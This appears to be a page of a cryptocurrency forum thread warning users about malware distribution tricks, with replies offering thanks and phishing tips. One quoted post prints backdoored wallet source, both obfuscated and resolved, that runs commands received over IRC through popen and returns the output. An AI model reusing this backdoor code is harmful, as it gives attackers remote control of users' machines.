Pages:
Author

Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 22. (Read 859179 times)

newbie
Activity: 37
Merit: 0
How the hell are the malwares doing edition to forums post? It can only be changed by the participants though
newbie
Activity: 88
Merit: 0
I have not seen a reply in a while. Has there been less malware or is this still a major concern?
newbie
Activity: 1022
Merit: 0
As a member of Newbie it is a terrific and discussing matter for me. I think do we need to be beware of increasingly sophisticated malware infection attempts after moving we can also earn easily coin as well bit coin forum help and I hope to block all malware to protect and save our cirrency
member
Activity: 124
Merit: 10
This is terrible, I really thank you, because I almost caught, and now I start to install Adblock, I hope to block all the malwares from online websites.

I'm also was nearly caught with that scammers, also you can use not only adblock for this, adguard works good too, and blocking more, then adblock, as I see
newbie
Activity: 98
Merit: 0
Seriously? Is this the state of btcs now? then I am gonna quit from it.
member
Activity: 471
Merit: 10
QUUBE — First&Only Quantum Resistant Ecosystem
Just seeing this. Thanks for the security info. I will try to be careful with any downloads and website visits. Hackers are on the rampage nowadays
hero member
Activity: 1820
Merit: 775
somebody took my ether today from mew. how can that be possible?

Maybe you were connected on the wrong MEW, I mean a fake site. You should follow security instructions from MEW

DON'T GET PHISHED, please! 🎣 Thank you! 🤗
1. BOOKMARK MYETHERWALLET.COM      2. INSTALL EAL or MetaMask or Cryptonite

newbie
Activity: 112
Merit: 0
somebody took my ether today from mew. how can that be possible?
newbie
Activity: 490
Merit: 0
Now a days a lot of phishing and malware infected hacking attempts are happening
due to bad guys who want to steel your personal information specially private keys.
Block chain technology is a good technology but still it has a lot of problems that
need to be addressed. I want in every cryptocurrency wallet there should be
double factor authentication key that work with Google authenticator.
newbie
Activity: 490
Merit: 0
Now a days a lot of phishing and malware infected hacking attempts are happening due to bad guys
who want to steel your personal information specially private keys. Block chain technology is a good
technology but still it has a lot of problems that need to be addressed. I want in every cryptocurrency
wallet there should be double factor authentication key that work with Google authenticator.
legendary
Activity: 2156
Merit: 1131
I was thinking if there is way to automatic delete any Malware link post on this forum so that we may not even get to open the link.

You can't detect if an URL is malicious or not.
Either all URL are ban or people are very careful.
newbie
Activity: 34
Merit: 0
I was thinking if there is way to automatic delete any Malware link post on this forum so that we may not even get to open the link.
newbie
Activity: 69
Merit: 0
Yes I was totally aware of it
full member
Activity: 252
Merit: 100
This is terrible, I really thank you, because I almost caught, and now I start to install Adblock, I hope to block all the malwares from online websites.
member
Activity: 328
Merit: 39
Thank you very much for your precious info; I'm really stunned, as I never thought there were so many ways to be scammed Sad

Your post made me to think in a paranoid way, and I just wondered if we can really trust antimalware softwares: how can we be sure that THEY don't put something malicious, or don't scan for private keys?

It seems that we are really in an electronic far west, and probably the next big battle will be in the field of security.
newbie
Activity: 126
Merit: 0
we need say thanks U.. Smiley) clap clpap
newbie
Activity: 21
Merit: 0
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Don't forget airship registration, asking for private keys.. I sent them mones and luckily found out immediately after I sent it.. and move my coin out the wallet and created a new wallet.
newbie
Activity: 4
Merit: 0
This is very informative especially to newbies like me. Thank you. Reading all the threads. I need to add security measures.
gng
newbie
Activity: 210
Merit: 0
you think faucet sites send malware ?
newbie
Activity: 24
Merit: 0
Cant you give anything new? It was prevailing from a very old times in btcs
Pages:
Jump to: